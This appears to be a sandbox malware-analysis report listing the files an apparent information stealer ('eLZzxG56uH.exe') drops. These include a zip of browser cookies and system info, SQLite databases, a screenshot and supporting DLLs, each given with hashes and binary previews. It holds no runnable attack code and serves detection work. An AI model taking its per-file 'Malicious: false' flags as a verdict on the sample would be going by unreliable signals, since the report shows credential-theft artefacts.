SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\U9ijEleEIk4.zip Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	54771
Entropy (8bit):	7.992654902383285
Encrypted:	true
SSDEEP:	768:VuG/yCsytl6iY7No+DZZCWOZa9FMB43kMGHgruHhsp53qtqKBtXwtKKzpWCudPys:VZ/njl25fFoByKoAo6t56FAW+D
MD5:	C4D44FB6F89AA681B86469265D68F26A
SHA1:	495D5B80158A107F957CC528E3FCFCB6B9C647D3
SHA-256:	9A2FAEB0F707E98213BCABFF665657F69777D631BB77E672E0C57E049CA109FB
SHA-512:	FE0F0E9ABEC4FF3D3493772CA72158B61891BF32E8C4E4D3F69B6B97B8446A41705BA38B4C0A8595F654F125BE816240A9417674131C83D31B1D62835FB923BC
Malicious:	false
Preview:	PK.........F<S_.Z............browsers/cookies/Google Chrome_Default.txtUT...j.Raj.Raj.Ra%..N.0...3&>.&......Q.n...B.ip.....O......e.gq..i.7N........9.[YL,.F.ug..L....G...l.....6:...#.2..%..g...\|....Ly7<'.......H......A....KI..I..e...-.$...Pf....se..@<....s.....M...).........PK.........F<S.a......9.......System Info.txtUT.....Ra..Ra..RauS.N.0.}...yL%b..N.6...-Tm../.$..H..N.i?~'4e.(R.3..3.3.l<.....f..+.....NN~.Z]...}.K..lT.7......P.R...8..}...a\6.;FhB....0....p..t......0..t.....Y..$.(...H.Y4...$..I[..U[U...@B..ccj...??....1.Z..X.,.s.......aa./..W.=\T...e.M...>2...[.aZmK.v_...W.../`g]..X. B.$.$Hztn.....I..!. H4..J..n[.....w...7eKY......G...m...{<Y0.y.....;\|t.CotU.g.O....7.(9z...h.....dF...z..w)...1..u..5..V...o.....8.~.'!...7.Bl,...U..O.,F.E.a.:U....U..1e{p.qA_....&..\|..x.9^,.?...:....F.......F...5.,.....6....+.P.^6.R.P.&c.XB(.S.D].?....w...^YD(......3..&..UY...H@.....[>I.....C%...E....mL.B.....#..m........NW.9.U...g..".".@...n`Z...o...PK......

C:\Users\user\AppData\LocalLow\frAQBc8Wsa Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.792852251086831
Encrypted:	false
SSDEEP:	48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
MD5:	81DB1710BB13DA3343FC0DF9F00BE49F
SHA1:	9B1F17E936D28684FFDFA962340C8872512270BB
SHA-256:	9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
SHA-512:	CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\rQF69AzBla Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6970840431455908
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
MD5:	00681D89EDDB6AD25E6F4BD2E66C61C6
SHA1:	14B2FBFB460816155190377BBC66AB5D2A15F7AB
SHA-256:	8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
SHA-512:	159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\screen.jpeg Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	61938
Entropy (8bit):	7.73027576861832
Encrypted:	false
SSDEEP:	1536:P7V6Cmg253g73bttVnLX8XWXd5R+XN+cB5l:zvbtjbVXPR+XNt5l
MD5:	26B59E6C3269F222FB17F25EA241F0E9
SHA1:	5BD75114468362CC23A7B26DC96791AE1CBDEA47
SHA-256:	222C7AFB03FF1B90A6A60091FFE20150DD72ED90AB0145ABC47C93A4B8A08704
SHA-512:	7CDD70CB2303BAFE3AEBB054161ADF6A549F26B3B5A71F88F229A47AA8D526C4C42275F6EAFA25F62A7A914590407B320D768761B9DED83C62D66EC998C045D0
Malicious:	false
Preview:	......JFIF.....`.`.....C................3!....?-/%3JANMIAHFR\vdRWoXFHf.hoz}...Oc.....v......C.......<!!<.THT............................................................."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..(.......f.>y.H.,g...?...r-2..Gi.....O.J.c......<....?.j..;u.e.._.?......6..ki...bd..#..=...E-.....R..WP..y..........g._.....eX}b.sOg..1K]@.v..... ...U.]C.k....vL....\F....[.QE%hH.RR..QK]7..k-N.g.FfI0.b8.&.5..R...'...)?....=+.y.....O:.+<..._.C.H...#?t.w..\.)F*......I.MXm....(...(.:lI>.k...9&Ea.d......}..\|...#...&.4.y.................j..t."X...#......O..d>S..._...5

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
SSDEEP:	24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: SKM_C258.EXE, Detection: malicious, Browse Filename: Aqlmlmmeey.exe, Detection: malicious, Browse Filename: 6lGJNtdKHt.exe, Detection: malicious, Browse Filename: nGiDZ9ZC2d.exe, Detection: malicious, Browse Filename: xx2wsaL3cJ.exe, Detection: malicious, Browse Filename: 75fcGkVO1k.exe, Detection: malicious, Browse Filename: 8aAG42oIjb.exe, Detection: malicious, Browse Filename: Zq0u07ZGkg.exe, Detection: malicious, Browse Filename: jUV82t8dgh.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.W32.AIDetect.malware1.14529.exe, Detection: malicious, Browse Filename: OARirszNK2.exe, Detection: malicious, Browse Filename: rbQe356Ces.exe, Detection: malicious, Browse Filename: Neue Bestellung 09001.exe, Detection: malicious, Browse Filename: OTKqvzSZfm.exe, Detection: malicious, Browse Filename: u8NGCuPdOR.exe, Detection: malicious, Browse Filename: e5jVcbuCo5.exe, Detection: malicious, Browse Filename: 729f05959f10226a50f13f2cdf5eb8d6d0761fc8a332d.exe, Detection: malicious, Browse Filename: iQjdq8GOib.exe, Detection: malicious, Browse Filename: aRJ7tjHVOF.exe, Detection: malicious, Browse Filename: 4o99bctKos.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleHandler.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	123344
Entropy (8bit):	6.504957642040826
Encrypted:	false
SSDEEP:	1536:DkO/6RZFrpiS7ewflNGa35iOrjmwWTYP1KxBxZJByEJMBrsuLeLsWxcdaocACs0K:biRZFdBiussQ1MBjq2aocts03/7FE
MD5:	F92586E9CC1F12223B7EEB1A8CD4323C
SHA1:	F5EB4AB2508F27613F4D85D798FA793BB0BD04B0
SHA-256:	A1A2BB03A7CFCEA8944845A8FC12974482F44B44FD20BE73298FFD630F65D8D0
SHA-512:	5C047AB885A8ACCB604E58C1806C82474DC43E1F997B267F90C68A078CB63EE78A93D1496E6DD4F5A72FDF246F40EF19CE5CA0D0296BBCFCFA964E4921E68A2F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........y.Z.............x.......x.......x......=z......=z......=z.......x.......x..........z.../{....../{....../{....../{b...../{......Rich............PE..L...C@.\.........."!.................b.......0......................................~p....@.................................p...........h...........................0...T................... ...........@............0..$............................text...7........................... ..`.orpc........ ...................... ..`.rdata...y...0...z..................@..@.data...............................@....rsrc...h...........................@..@.reloc..............................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\AccessibleMarshal.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	26064
Entropy (8bit):	5.981632010321345
Encrypted:	false
SSDEEP:	384:KuAjyb0Xc6JzVuLoW2XDOc3TXg1hjsvDG8A3OPLon07zS:BEygs6RV6oW2Xd38njiDG8Mj
MD5:	A7FABF3DCE008915CEE4FFC338FA1CE6
SHA1:	F411FB41181C79FBA0516D5674D07444E98E7C92
SHA-256:	D368EB240106F87188C4F2AE30DB793A2D250D9344F0E0267D4F6A58E68152AD
SHA-512:	3D2935D02D1A2756AAD7060C47DC7CABBA820CC9977957605CE9BBB44222289CBC451AD331F408317CF01A1A4D3CF8D9CFC666C4E6B4DB9DDD404C7629CEAA70
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S......U...U...U...U...U..T...U..T...U..T...U..T...U5.T...U...U!..U..T...U..T...U...U...U..T...URich...U........PE..L...<@.\.........."!.........8......0........0.......................................7....@..........................=......0>..x....`...............H..........<...09..T............................9..@............0...............................text...f........................... ..`.orpc........ ...................... ..`.rdata.......0......................@..@.data...@....P.......(..............@....rsrc........`.......*..............@..@.reloc..<............D..............@..B........................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\IA2Marshal.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	70608
Entropy (8bit):	5.389701090881864
Encrypted:	false
SSDEEP:	768:3n8PHF564hn4wva3AVqH5PmE0SjA6QM0avrDG8MR43:38th4wvaQVE5PRl0xs
MD5:	5243F66EF4595D9D8902069EED8777E2
SHA1:	1FB7F82CD5F1376C5378CD88F853727AB1CC439E
SHA-256:	621F38BD19F62C9CE6826D492ECDF710C00BBDCF1FB4E4815883F29F1431DFDA
SHA-512:	A6AB96D73E326C7EEF75560907571AE9CAA70BA9614EB56284B863503AF53C78B991B809C0C8BAE3BCE99142018F59D42DD4BCD41376D0A30D9932BCFCAEE57A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........~.....K...K...K.g.K...K4}.J...K4}.J...K4}.J...K4}.J...K...J...K...J...K...K...K&\|.J...K&\|.J...K&\|uK...K&\|.J...KRich...K........PE..L...J@.\.........."!.................$.......0...............................0............@.........................0z.......z...........v................... .......u..T...........................Hv..@............0...............................orpc...t........................... ..`.text........ ...................... ..`.rdata...Q...0...R..................@..@.data................j..............@....rsrc....v.......x...t..............@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\MapiProxy_InUse.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	19920
Entropy (8bit):	6.2121285323374185
Encrypted:	false
SSDEEP:	384:Y0GKgKt7QXmFJNauBT5+BjdvDG8A3OPLon6nt:aKgWc2FnnTOVDG8MSt
MD5:	7CD244C3FC13C90487127B8D82F0B264
SHA1:	09E1AD17F1BB3D20BD8C1F62A10569F19E838834
SHA-256:	BCFB0E397DF40ABA8C8C5DD23C13C414345DECDD3D4B2DF946226BE97DEFBF30
SHA-512:	C6319BB3D6CB4CABF96BD1EADB8C46A3901498AC0EB789D73867710B0D855AB28603A00647A9CF4D2F223D35ADB2CB71AB22C284EF18823BFF88D87CF31FD13D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X...X...X... J..X...:...X...:...X...:...X...:...X...8...X...X...X...;...X...;...X...;&..X...;...X..Rich.X..........................PE..L....=.\.........."!................@........0............................................@.........................0:.......:..d....`..p............0.......p.......5..T...........................86..@............0...............................text...v........................... ..`.orpc...<.... ...................... ..`.rdata..r....0......................@..@.data........P.......&..............@....rsrc...p....`.......(..............@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.112057846012794
Encrypted:	false
SSDEEP:	192:IWIghWGJnWdsNtL/123Ouo+Uggs/nGfe4pBjSfcD63QXWh0txKdmVWQ4yW1rwqnh:IWPhWlsnhi00GftpBjnem9lD16PamFP
MD5:	E2F648AE40D234A3892E1455B4DBBE05
SHA1:	D9D750E828B629CFB7B402A3442947545D8D781B
SHA-256:	C8C499B012D0D63B7AFC8B4CA42D6D996B2FCF2E8B5F94CACFBEC9E6F33E8A03
SHA-512:	18D4E7A804813D9376427E12DAA444167129277E5FF30502A0FA29A96884BF902B43A5F0E6841EA1582981971843A4F7F928F8AECAC693904AB20CA40EE4E954
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...._.L...........!......................... ...............................0............@.............................L............ ..................8=..............T............................................................................text...<........................... ..`.rsrc........ ......................@..@....._.L........8...T...T........_.L........d................_.L....................RSDS........g"Y........api-ms-win-core-file-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg.......L....edata... ..`....rsrc$01....` .......rsrc$02........._.L....@...................(...8...l...............`.......................api-ms-win-core-file-l1-2-0.dll.CreateFile2.kernel32.CreateFile2.GetTempPathW.kernel32.GetTempPathW.GetVolumeNameForVolumeMountPointW.kernel32.GetVolumeNameForVolumeMou

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-file-l2-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.166618249693435
Encrypted:	false
SSDEEP:	192:BZwWIghWG4U9ydsNtL/123Ouo+Uggs/nGfe4pBjSbUGHvNWh0txKdmVWQ4CWVU9h:UWPhWFBsnhi00GftpBjKvxemPlP55QQ7
MD5:	E479444BDD4AE4577FD32314A68F5D28
SHA1:	77EDF9509A252E886D4DA388BF9C9294D95498EB
SHA-256:	C85DC081B1964B77D289AAC43CC64746E7B141D036F248A731601EB98F827719
SHA-512:	2AFAB302FE0F7476A4254714575D77B584CD2DC5330B9B25B852CD71267CDA365D280F9AA8D544D4687DC388A2614A51C0418864C41AD389E1E847D81C3AB744
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...4..\|...........!......................... ...............................0......t.....@.......................................... ..................8=..............T............................................................................text...}........................... ..`.rsrc........ ......................@..@....4..\|........8...T...T.......4..\|........d...............4..\|....................RSDS.=.Co.P..Gd./%P....api-ms-win-core-file-l2-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........4..\|........................D...p...............#...P...................;...g...................<...m...............%...Z.........................api-ms-win-core-file-l2-1-0.dll.CopyFile2.kernel32.CopyFile2.CopyFileExW.kernel32.CopyFileExW.Crea

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-handle-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.1117101479630005
Encrypted:	false
SSDEEP:	384:AWPhWXDz6i00GftpBj5FrFaemx+lDbNh/6:hroidkeppp
MD5:	6DB54065B33861967B491DD1C8FD8595
SHA1:	ED0938BBC0E2A863859AAD64606B8FC4C69B810A
SHA-256:	945CC64EE04B1964C1F9FCDC3124DD83973D332F5CFB696CDF128CA5C4CBD0E5
SHA-512:	AA6F0BCB760D449A3A82AED67CA0F7FB747CBB82E627210F377AF74E0B43A45BA660E9E3FE1AD4CBD2B46B1127108EC4A96C5CF9DE1BDEC36E993D0657A615B6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....G...........!......................... ...............................0......V.....@............................._............ ..................8=..............T............................................................................text..._........................... ..`.rsrc........ ......................@..@......G........:...T...T.........G........d.................G....................RSDSQ..{...IS].0.> ....api-ms-win-core-handle-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg......._....edata... ..`....rsrc$01....` .......rsrc$02......................G....Z...............(...<...P...................A...\|...............,.............api-ms-win-core-handle-l1-1-0.dll.CloseHandle.kernel32.CloseHandle.CompareObjectHandles.kernel32.CompareObjectHandles.DuplicateHandle.kernel32

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-heap-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.174986589968396
Encrypted:	false
SSDEEP:	192:GElqWIghWGZi5edXe123Ouo+Uggs/nGfe4pBjS/PHyRWh0txKdmVWQ4GWC2w4Dj3:GElqWPhWCXYi00GftpBjP9emYXlDbNs
MD5:	2EA3901D7B50BF6071EC8732371B821C
SHA1:	E7BE926F0F7D842271F7EDC7A4989544F4477DA7
SHA-256:	44F6DF4280C8ECC9C6E609B1A4BFEE041332D337D84679CFE0D6678CE8F2998A
SHA-512:	6BFFAC8E157A913C5660CD2FABD503C09B47D25F9C220DCE8615255C9524E4896EDF76FE2C2CC8BDEF58D9E736F5514A53C8E33D8325476C5F605C2421F15C7D
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....:............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@......:.........8...T...T.........:.........d.................:.....................RSDS.K....OB;....X......api-ms-win-core-heap-l1-1-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02..........:.........................X...............2...Q...q.......................C...h...........................(...E...f.......................0..._...z...............................................api-ms-win-core-heap-l1-1-0.dll.GetProcessHeap.k

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-interlocked-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	17856
Entropy (8bit):	7.076803035880586
Encrypted:	false
SSDEEP:	192:DtiYsFWWIghWGQtu7B123Ouo+Uggs/nGfe4pBjSPiZadcbWh0txKdmVWQ4mWf2FN:5iYsFWWPhWUTi00GftpBjremUBNlgC
MD5:	D97A1CB141C6806F0101A5ED2673A63D
SHA1:	D31A84C1499A9128A8F0EFEA4230FCFA6C9579BE
SHA-256:	DECCD75FC3FC2BB31338B6FE26DEFFBD7914C6CD6A907E76FD4931B7D141718C
SHA-512:	0E3202041DEF9D2278416B7826C61621DCED6DEE8269507CE5783C193771F6B26D47FEB0700BBE937D8AFF9F7489890B5263D63203B5BA99E0B4099A5699C620
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....$.............!......................... ...............................0...........@.......................................... ...................9..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....$..........?...T...T........$..........d................$......................RSDS#.......,.S.6.~j....api-ms-win-core-interlocked-l1-1-0.pdb..........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.................$......................(...T...............L...............!...U...................1.......p...............@...s.................................api-ms-win-core-interlocked-l1-1-0.dll.InitializeSListHead.kernel32.InitializeSLis

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-libraryloader-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.131154779640255
Encrypted:	false
SSDEEP:	384:yHvuBL3BmWPhWZTi00GftpBjNKnemenyAlvN9W/L:yWBL3BXYoinKne1yd
MD5:	D0873E21721D04E20B6FFB038ACCF2F1
SHA1:	9E39E505D80D67B347B19A349A1532746C1F7F88
SHA-256:	BB25CCF8694D1FCFCE85A7159DCF6985FDB54728D29B021CB3D14242F65909CE
SHA-512:	4B7F2AD9EAD6489E1EA0704CF5F1B1579BAF1061B193D54CC6201FFDDA890A8C8FACB23091DFD851DD70D7922E0C7E95416F623C48EC25137DDD66E32DF9A637
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....ul...........!......................... ...............................0......9.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@.....ul........A...T...T........ul........d................ul....................RSDSU..e.j.(.wD.......api-ms-win-core-libraryloader-l1-1-0.pdb............T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.............ul....................(...p...........R...}..................Y...................8..._.......................B...k...................F...u...............)...P...w...................................................api-ms-win-c

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-localization-l1-2-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	20792
Entropy (8bit):	7.089032314841867
Encrypted:	false
SSDEEP:	384:KOMw3zdp3bwjGjue9/0jCRrndbVWPhWIDz6i00GftpBj6cemjlD16Pa+4r:KOMwBprwjGjue9/0jCRrndbCOoireqv
MD5:	EFF11130BFE0D9C90C0026BF2FB219AE
SHA1:	CF4C89A6E46090D3D8FEEB9EB697AEA8A26E4088
SHA-256:	03AD57C24FF2CF895B5F533F0ECBD10266FD8634C6B9053CC9CB33B814AD5D97
SHA-512:	8133FB9F6B92F498413DB3140A80D6624A705F80D9C7AE627DFD48ADEB8C5305A61351BF27BBF02B4D3961F9943E26C55C2A66976251BB61EF1537BC8C212ADD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...S.v............!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@....S.v.........@...T...T.......S.v.........d...............S.v.....................RSDS..pS...Z4Yr.E@......api-ms-win-core-localization-l1-2-0.pdb.........T....rdata..T........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02................S.v.....v.......;...;...(.......................<...f.......................5...]...................!...I...q...................N.............../...j.............../...^.................../...\...................8...`...........

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-memory-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18744
Entropy (8bit):	7.101895292899441
Encrypted:	false
SSDEEP:	384:+bZWPhWUsnhi00GftpBjwBemQlD16Par7:b4nhoi6BedH
MD5:	D500D9E24F33933956DF0E26F087FD91
SHA1:	6C537678AB6CFD6F3EA0DC0F5ABEFD1C4924F0C0
SHA-256:	BB33A9E906A5863043753C44F6F8165AFE4D5EDB7E55EFA4C7E6E1ED90778ECA
SHA-512:	C89023EB98BF29ADEEBFBCB570427B6DF301DE3D27FF7F4F0A098949F987F7C192E23695888A73F1A2019F1AF06F2135F919F6C606A07C8FA9F07C00C64A34B5
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....%(...........!......................... ...............................0............@.............................l............ ..................8=..............T............................................................................text...l........................... ..`.rsrc........ ......................@..@......%(........:...T...T.........%(........d.................%(....................RSDS.~....%.T.....CO....api-ms-win-core-memory-l1-1-0.pdb...........T....rdata..T........rdata$zzzdbg.......l....edata... ..`....rsrc$01....` .......rsrc$02......................%(....................(...h...........)...P...w...................C...g...................%...P...........B...g...................4...[...\|...................=...................................api-ms-win-core-memory-l1-1-0.dl

C:\Users\user\AppData\LocalLow\uS0wV5wY9qH3\api-ms-win-core-namedpipe-l1-1-0.dll Download File
Process:	C:\Users\user\Desktop\eLZzxG56uH.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	18232
Entropy (8bit):	7.16337963516533
Encrypted:	false
SSDEEP:	192:pgWIghWGZiBeS123Ouo+Uggs/nGfe4pBjS/fE/hWh0txKdmVWQ4GWoxYyqnaj/6B:iWPhWUEi00GftpBj1temnltcwWB
MD5:	6F6796D1278670CCE6E2D85199623E27
SHA1:	8AA2155C3D3D5AA23F56CD0BC507255FC953CCC3
SHA-256:	C4F60F911068AB6D7F578D449BA7B5B9969F08FC683FD0CE8E2705BBF061F507
SHA-512:	6E7B134CA930BB33D2822677F31ECA1CB6C1DFF55211296324D2EA9EBDC7C01338F07D22A10C5C5E1179F14B1B5A4E3B0BAFB1C8D39FCF1107C57F9EAF063A7B
Malicious:	false
